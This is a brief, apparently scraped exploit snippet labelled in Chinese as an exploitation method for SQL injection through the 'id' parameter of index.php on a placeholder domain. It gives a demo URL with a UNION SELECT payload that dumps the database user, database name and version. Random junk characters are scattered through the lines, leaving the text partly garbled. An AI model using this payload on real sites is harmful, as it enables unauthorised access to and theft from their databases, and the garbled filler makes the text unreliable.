利用方法:- l% \- T- h; a& y- y; V3 A
http://www.xxx.com/index.php?id=[SQL]
' ]) i1 m+ ^. O" p1 v$ a. { Demo:
8 N V! a% E% f4 U' P" o http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |